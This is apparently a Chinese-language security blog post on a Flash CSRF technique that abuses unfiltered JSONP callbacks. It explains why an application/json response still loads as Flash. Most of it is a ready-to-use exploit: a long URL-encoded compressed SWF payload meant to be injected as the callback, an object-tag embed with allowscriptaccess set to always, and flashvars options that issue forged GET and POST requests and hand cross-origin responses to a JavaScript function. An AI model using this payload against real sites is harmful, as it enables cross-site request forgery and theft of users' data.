Flash csrf via jsonp callback

成因


在使用object标签加载flash时,如果存在 Content-Disposition 头并且值为 attachment,是不会加载的。虽然我没有测试是否存在白名单得 Content-type 使得其可以加载Flash,但显然,今天的主角 application/json 可以。

在Flash的hex末尾添加任意字符,Flash依然可以正常加载。这也就造就了最终的 Flash csrf via Jsonp callback。

利用

利用代码

使用如下代码作为Jsonp的callback,如果没有过滤/转义,或者任何其他处理,CSRF可能成立。

CWS%09%B2%06%00%00x%9C%7DU%DBR%DBF%18%DE%95VZ%C9gc%23%83%81%60%C0%84%1C%5C%5B%844m%DDC%0E%40R%18%A83%403%BD%B1%A3%B5%BC%B6%D5%C8%92%23%AD%29%DC%F5%0Dz%DD%99%5E%F4%0D%3A%D3%CB%DE%E4%15%9C%5C%E4%0D%DA%D7%A0%2BK%D0%98v%BA%A3%D1%7F%D8%FF%F0%FD%87%91%CE%80%F4%12%80%F4%AF%00%24+%D8%C9%2A%00%80m%E1%E2%E2%E2%CDl%82%B3%10%FC%F9%CB%1F%7F%FD%FC%5Bi%13%807%F9%17r%A0%E1%27%03%AA%01%D9S%18%F5%D9%CB%AEM%12%87%C4rN%AC%01%B5-%87%26%B9%C2%EFW%3B%96%3F%B4%C9%B9z%E8%9EZt%DB%B6%86%B3%97%D6%F5%0F%AD%81%D4%A3%CCb%B2%ED%92%0E%F5%D4%D0%D7%A1L%FD%F6%E8%E0%60%A2C%A7%C4%F3%13%5C%7CA%3C%8B%B4m%EA%2B%26%B1%ED61_AS%3Ef%9E%E5%F4%E4%AEG%06t%13%12q%E4%D9h%E8%FAL%F4%E8%EB%18w%3A%A2%AFG%3C%AFl%F9%1E%25%1D%D1rX%22%CCAO%A9%C3%7Ci7+%CAv%E3%F0%F9%C1%EE%C9n%86t%3A%13%CD%81%E53%EA%F0%E4%01%AET%E4q%C6%A8%E7%10%3B%BB%1B1%7B%0E%A7%5DbR%99%11%8F%97%B1%D2glX%AF%D5H%C7m%D3%AA%E9%0Ej%8F%8F%B7j%F7t%FDA%AD%3D%B2lf9%F1%F0j%C4%2C%DB%CF%85Q%89iR%DF%B7%DA%96m%B1%F3Kl%9E%E7z%7E%D4%C8.%F7%A4%9E%1F%0B%A5%1Eu%07%F1%90%1D%D0%8EE%22lC%DE%05%1E%BF%17%05%F0%CF9%FCA%E4%C28p%25dGV%E4%3BA%10u%FBl%60%17%A6fV%BF%9AY%7EZ%7F%CC%D30Z%9EV%EE%84%B4%D1%FE%9E%9Al%DBu%18%9F.%F5%96%A7%8D%26%AD%22%26%B3Nih%B8%F0%3FA%16%3F%9CP%7D2%8F%E0%9E0%B3O%3D9%B4A%1D%C2%08%0A%16%21n%BA%8E%EF%DA%B4j%BB%3D%EDh%E4%94x%E3%07%C4%E9%94%DCW%15%8F%B2%91%E7%D4%25%9F%91%1E%8D%85%3B%B6%E7t%DD%D8%90%04%0B%13%F4u%E9%1A%D0%27%16%1B%90%E1%8EG%7E%08vmi%0A%CA%DEu%2C%1Dj%BA%1D%9A%F9g%CF%0E%29%EB%BB%1D%F4%BCq%7C%22%0FB%7E%B2w%7C%3BR%7C%B7%9E%06Y%8FM%CF%1A%B2%F4%B5X%C9%A9%16d%FF%D50%ED%BF%FB%2C%873Y%D5%A0%26%CEI%9A%AC%A9%05%A8%CDiK%12%90%80R%D2V%B4UmM%2Bk%EB%DAMmC%BB%A5%DD%D6%EEhw%B5JQ%2A%7ET%AC%16kE%BD%B8Y%BCW%DCR%3EW%BE%10%97U%09%23%25%06%E5x%22%29%A4%D2%99%ECL.%3F%AB%15%C4%B9%F9%E2%C2%E2%D2%8D%E5%94%8A%E4%2B%A1%B4r%17C%01%0B%08%23%CC%BD%B0%14%C3%28%8E%A5%04FI%8CR%18%A5%B1%9C%C1%28%8B%D1%0CF9%8C%F2X%9A%C5H%C3%A8%80%F1%3CFE%8C%160Z%C4%CA%0Du%19%AA%F7%21F%1Fc%F4%29F%9FaT_%100%FA%12K_a%F4%10%A3G%18%DD%C7h%1B%A3-%8Cw%B0%B0%8B%85%A7Xx%86%85%AFe%00%A2%AF%D1%E45u+%14%14%11%A0%B8%08%01D%807%82%1Bc%A0%40+%A8%00%C4%40%1C%021%110%C9%E0%95%0A%5E%E9%E0%A3%96%05%60%26%F0%96+D%90%FB%40%A8%C6%C4%B1%FE%8C%ABD1%16_%1B%EB%A5%1F%A5%F7Mi_%02%9C%BE3r%DD%BC%A14f%85w%CD%CC%DB%FD%0Clh%90%9B%0A%A2%10%8BW%C6%BA%91-%C3%3C%CFb%14%0C%F5mw%AE%3B%DF%28%0AF%A1%F2%A0%F2I%C4%5C%2A%B9%8F%28%C2X%FCw8%D6%5B%09c%A1%BB%D8%5D%AAd%BB7%FA%89%96%1AI%29.%A9%ADd%24%CDp%29%D9JER%8EK%A9Vv%FD%A7o%FAY%23Q%C9%E5w%00h%C9M%BC%8FA_6d%23%D5X%86%ADt3c%249%C4%7E%DAH%1B%A5%EE%0AY%E5T%26k-4%A9%A6%8F%0CtU%0Dg%D3%BC%14%1E%EBq%9E7%A8%C5%EB%E8g%9B%A2%91l%88%81%F2I%1E%03%10%89%1C%3A%0A%A0%A7%C7%FAx%0F4%CBe%60%C4%1B%E5%A0%22I%E0%CD%DB%18%EB%14%18%EB%BAqS76t%E3%96n%DC%D6%8D%3B%BA%21%F0%E7%3B%B0%14%9E%7E%10%E5a%AE%18%0D%F2%F2%1FQ%9D%FAG%3C%E27%7F%03iF%BAw

利用方法

<object style="height:1px;width:1px;" data="http://localhost/jsonp.php?callback=[code]" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="a=get&url=http://localhost/x.php"></object>
flashvars:
a=get&url=http://xxxxx  (get url data)
a=post&url=http://xxxx&post=a=1%26b=2 (post url data)
a=read&c=alert&url=http://xxxx (get url data and call in js function)


截图

利用截图

源码下载

flashscrf.fla